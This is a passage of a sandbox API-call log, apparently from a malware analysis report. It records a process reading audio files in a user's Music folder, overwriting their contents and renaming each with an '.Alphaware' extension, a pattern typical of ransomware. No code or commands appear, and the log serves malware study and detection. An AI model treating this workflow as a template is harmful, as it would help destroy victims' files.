dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.762] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x12bbb [0087.762] ReadFile (in: hFile=0x254, lpBuffer=0x2534958, nNumberOfBytesToRead=0x12bbb, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2534958*, lpNumberOfBytesRead=0x23ea98*=0x12bbb, lpOverlapped=0x0) returned 1 [0087.837] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav", nBufferLength=0x105, lpBuffer=0x23e400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav", lpFilePart=0x0) returned 0x28 [0087.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.837] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vrh278.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.839] GetFileType (hFile=0x254) returned 0x1 [0087.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.839] GetFileType (hFile=0x254) returned 0x1 [0087.839] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.840] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.840] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.842] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.842] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.842] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.842] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.845] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.845] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.845] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.846] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.846] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e978, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e978*=0x1000, lpOverlapped=0x0) returned 1 [0087.846] WriteFile (in: hFile=0x254, lpBuffer=0x23ec908*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23ec908*, lpNumberOfBytesWritten=0x23e958*=0x74, lpOverlapped=0x0) returned 1 [0087.847] CloseHandle (hObject=0x254) returned 1 [0087.850] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav", nBufferLength=0x105, lpBuffer=0x23e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav", lpFilePart=0x0) returned 0x28 [0087.850] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav.Alphaware", nBufferLength=0x105, lpBuffer=0x23e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav.Alphaware", lpFilePart=0x0) returned 0x32 [0087.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vrh278.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9204120, ftCreationTime.dwHighDateTime=0x1d96e2c, ftLastAccessTime.dwLowDateTime=0xf46579d0, ftLastAccessTime.dwHighDateTime=0x1d97371, ftLastWriteTime.dwLowDateTime=0x86901fe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19074)) returned 1 [0087.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.850] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vrh278.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vrh278.wav.alphaware")) returned 1 [0087.868] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav", nBufferLength=0x105, lpBuffer=0x23e700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav", lpFilePart=0x0) returned 0x34 [0087.869] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav", dwFileAttributes=0x80) returned 1 [0087.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\zre7dehupyx5_4a02p.wav"), fInfoLevelId=0x0, lpFileInformation=0x23eeb88 | out: lpFileInformation=0x23eeb88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe9179a90, ftCreationTime.dwHighDateTime=0x1d97597, ftLastAccessTime.dwLowDateTime=0x4c086d00, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x4c086d00, ftLastWriteTime.dwHighDateTime=0x1d97642, nFileSizeHigh=0x0, nFileSizeLow=0x13695)) returned 1 [0087.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.869] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav", nBufferLength=0x105, lpBuffer=0x23e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav", lpFilePart=0x0) returned 0x34 [0087.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.870] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\zre7dehupyx5_4a02p.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.870] GetFileType (hFile=0x254) returned 0x1 [0087.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.870] GetFileType (hFile=0x254) returned 0x1 [0087.870] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x13695 [0087.870] ReadFile (in: hFile=0x254, lpBuffer=0x23eee10, nNumberOfBytesToRead=0x13695, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23eee10*, lpNumberOfBytesRead=0x23ea98*=0x13695, lpOverlapped=0x0) returned 1 [0087.871] CloseHandle (hObject=0x254) returned 1 [0087.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.943] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\zre7dehupyx5_4a02p.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.944] GetFileType (hFile=0x254) returned 0x1 [0087.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.944] GetFileType (hFile=0x254) returned 0x1 [0087.944] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.945] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.947] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.947] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.947] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.947] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.948] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.948] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.948] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.948] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.949] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.949] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.949] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.949] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.950] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.950] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.950] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.950] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.950] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.951] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.951] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0087.951] WriteFile (in: hFile=0x254, lpBuffer=0x24b9010*, nNumberOfBytesToWrite=0xef4, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b9010*, lpNumberOfBytesWritten=0x23e958*=0xef4, lpOverlapped=0x0) returned 1 [0087.951] CloseHandle (hObject=0x254) returned 1 [0087.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.954] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\zre7dehupyx5_4a02p.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9179a90, ftCreationTime.dwHighDateTime=0x1d97597, ftLastAccessTime.dwLowDateTime=0x4c086d00, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x869e6820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19ef4)) returned 1 [0087.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.954] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\zre7dehupyx5_4a02p.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\ZrE7dehuPYX5_4a02P.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\zre7dehupyx5_4a02p.wav.alphaware")) returned 1 [0087.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0087.955] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\8wsZ", lpFilePart=0x0) returned 0x1d [0087.955] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\*" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34bc6ee0, ftCreationTime.dwHighDateTime=0x1d96a07, ftLastAccessTime.dwLowDateTime=0x869e6820, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x869e6820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a1f0 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34bc6ee0, ftCreationTime.dwHighDateTime=0x1d96a07, ftLastAccessTime.dwLowDateTime=0x869e6820, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x869e6820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea934470, ftCreationTime.dwHighDateTime=0x1d970bd, ftLastAccessTime.dwLowDateTime=0x508d70b0, ftLastAccessTime.dwHighDateTime=0x1d97515, ftLastWriteTime.dwLowDateTime=0x86549d80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x120b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ucxK0MmIS9f.mp3.Alphaware", cAlternateFileName="7UCXK0~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27495620, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0xac8990b0, ftLastAccessTime.dwHighDateTime=0x1d97678, ftLastWriteTime.dwLowDateTime=0x865e2300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19860, dwReserved0=0x0, dwReserved1=0x0, cFileName="G5SxErXXVbP.m4a.Alphaware", cAlternateFileName="G5SXER~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x338b7fe0, ftCreationTime.dwHighDateTime=0x1d96c3f, ftLastAccessTime.dwLowDateTime=0x2ca4d490, ftLastAccessTime.dwHighDateTime=0x1d96d63, ftLastWriteTime.dwLowDateTime=0x8662e5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x203e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Is6Ew0Sgc3J0FKCDV.wav.Alphaware", cAlternateFileName="IS6EW0~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb52cdea0, ftCreationTime.dwHighDateTime=0x1d9769d, ftLastAccessTime.dwLowDateTime=0x9e5f290, ftLastAccessTime.dwHighDateTime=0x1d976a0, ftLastWriteTime.dwLowDateTime=0x86654720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a20, dwReserved0=0x0, dwReserved1=0x0, cFileName="k UEro1.mp3.Alphaware", cAlternateFileName="KUERO1~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9627e330, ftCreationTime.dwHighDateTime=0x1d9745c, ftLastAccessTime.dwLowDateTime=0x4efe81d0, ftLastAccessTime.dwHighDateTime=0x1d9749d, ftLastWriteTime.dwLowDateTime=0x866c6b40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11f48, dwReserved0=0x0, dwReserved1=0x0, cFileName="q_JfZqnkZKS-.m4a.Alphaware", cAlternateFileName="Q_JFZQ~1.ALP")) returned 1 